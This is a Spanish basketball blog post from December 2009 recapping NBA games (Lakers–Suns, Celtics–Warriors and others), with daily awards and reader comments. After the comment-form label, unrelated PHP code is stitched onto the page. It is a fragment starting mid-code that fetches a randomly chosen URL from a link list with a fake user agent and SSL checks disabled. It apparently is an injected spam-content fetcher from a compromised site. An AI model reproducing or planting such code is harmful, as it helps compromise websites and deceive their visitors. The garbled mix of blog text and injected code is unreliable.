La Crónica (28/12/2009)

29 de December de 2009 por txusma

Jornada de regalitos con el espíritu navideño todavía presente.

La defensa de los Lakers, sin Artest, recordó la de los peores momentos más “remorosos” dando todas las facilidades del mundo a unos Suns que tampoco las necesitan para causar daño si tienen el día. Con Odom sesteando, Fisher desacertado y Pau atravesando mini-crisis existencial, los amarillos no aguantaron el intercambio de golpes. Lástima, pues fue uno de las más completas actuaciones del banco de todo el curso. Mejor estuvo el de Phoenix con Dudley y Dragic tocando la guitarra.

El tropiezo de los líderes, sin embargo, quedó en nada. Los Celtics se enredaron con los Warriors con Monta Ellis volviendo loco a su defensor de turno. Los verdes van a pasar una temporada complicada si la infección de rodilla de Pierce es tan seria como algunos avisan.

Los Nuggets también la hicieron perdiendo en Sacramento a pesar de no jugar frente a Tyreke Evans. El partido se resolvió a triplacos. JR Smith estuvo horrible y Nocioni inmenso. Sergio jugó un buen número de minutos, bien en la distribución pero nefasto en el tiro.

Otros perseguidores que tropezaron fueron los Blazers, dando vidilla a unos Sixers que ya estaban a punto de incendiar el vestuario. Buen partido de Philadelphia con mención especial a Allen Iverson y Elton Brand, que el otro día se pasó tres pueblos rajando de los minutos que disfruta Speights. Más le valdría aprovechar mejor los que disfruta él.

Pero la cosa no queda ahí y el amigo Skyles decidió dar pseudo-vacaciones a Bogut, Redd y Delfino. Dicho así parece regalazo, pero siendo justos el equipo mejoró sin ellos en pista. Querer y no poder contra unos Bobcats muy serios.

Por último, los Grizzlies ganaron a los Wizards en la prórroga con, como bien apuntáis, Zach en estado de gracia y los Thunder pasaron su trámite contra los Nets.

PREMIOS

MVP: En Golden State saben que cualquier posibilidad de éxito pasa por los manos de Monta Ellis y partidos como el de ayer confirman que podría ser mucha más grande de lo que ya es. 37 puntos y protagonista indiscutible de la sorprendente victoria de su equipos frente los Celtics.  En Oklahoma, la estrella es Kevin Durant. 40 puntos como 40 soles les endosó a los Nets.

Rookie: Si falta Evans el rookie más destacado suele ser Brandon Jennings y anoche no fue una excepción. 24 puntos, 7 asistencias y la confirmación de que es el único líder del equipo tras el castigo de Skiles a Redd y Bogut. Destacamos también los correctos partidos de Serge Ibaka (6 puntos y 9 rebotes) y Jeff Pendergraph (11 puntos y 5 rebotes).

Sorpresa: Entre sus primeras temporadas y su lesión casi nos habíamos olvidado del chino Yi Jianlian pero parece que todavía respira. Ayer anotó 29 puntos y capturó 7 rebotes. También resultó sorprendente la actuación Andres Nocioni que ante la ausencia de Tyreke Evans fue el más destacado de los Kings en la victoria frente Denver. 21 y 6 rebotes.

Decepción: El 0 de 7 de Jarred Bayless o el 0 de 10 de James Harden tienen todos los puntos para ser considerados las decepción del día pero la de la pareja Bogut & Redd se lleva la palma. 1 de 10 para 2 míseros puntos entre ambos. Harto de tanto inoperancia tanto en ataque como en defensa, Scott Skiles decidió sentarles toda la segunda parte. ¿Estamos presenciando los últimos coletazos de Michael Redd que no concíamos?

Esfuerzo en vano: Perdieron los 2 mejores equipos de la liga a pesar de las actuaciones de Kobe Bryant (34 puntos y 7 rebotes) y Rajon Rondo (30 puntos y 15 asistencias), respectivamente. Vaya empanada.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Lo dicho, Bogut por unas cosas o por otras no hace temporadas completas a gran nivel.

    No me preocupa que Lakers pierda ciertos partidos, siempre que Pau no tenga problemas reales con el sistema.

      Citar

  2. Lagarto dice:
    #2

    Yo insisto en el temor que apuntaba en algún comentario posterior sobre la debilidad de estos Lakers frente a rivalas de enjundia. Porque seamos claros, amigos, los suns no son favoritos al título pero es un rival de enjundia (de la parte alta de la mitad superior de la tabla, que diría aquel…). Y no sé, a Gasol después de una serie muy completa tras su recuperación de lesión le he visto un partido muy flojo frente a Cavs y otro mediocre frente a Suns…tendrá que espabilar.

    Cambiando de tema, considero que los Grizzlies ya sí que se pueden considerar una sorpresa de la temporada…se ha convertido en un equipo decente, cosa impensable hace dos temporadas.

      Citar

  3. Love DEnise dice:
    #3

    Como dice Lagarto, está claro que los angelinos no están en su mejor momento, pero hoy al menos, Jackson hizo rotaciones. Sigo insistiendo que Gasol debe tirar más, y meterle más balones debajo del aro a Bynum.

    Cómo han cambiado los Grizzlies desde la marcha de Iverson, en Memphis deberán estar agradecidos de por vida a Allen que éste no aceptara su suplencia.
    Que merito tienen los Blazers sin sus pivots, Jennings tiene buena pinta, pero no me gustaría que se convirtiese en el nuevo chupón de la década sucediendo a Allen; y qué bueno es Gerald Wallace,

      Citar

  4. Txusma dice:
    #4

    Pero cuanto tiempo estuvo Iverson en los Grizzlies para decidir que era su presencia la que provocaba las derrotas? Si solo jugó 3 míseros partidos… No sé, creo q nunca sabremos que habrían hecho los Grizzlies si Iverson continuara en sus filas.

      Citar

  5. TheDeerHunter dice:
    #5

    Exáctamente es lo mismo que decir que los Rockets deberían estar agradecidos de por vida de que McGrady no acepte su suplencia.
    En cambio… oye, qué bien se porta Eddy Curry en los Knicks, que no se queja nunca. Gran profesional y mejor persona, ¿no???
    (estaba siendo irónico, por si no se ha notado)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>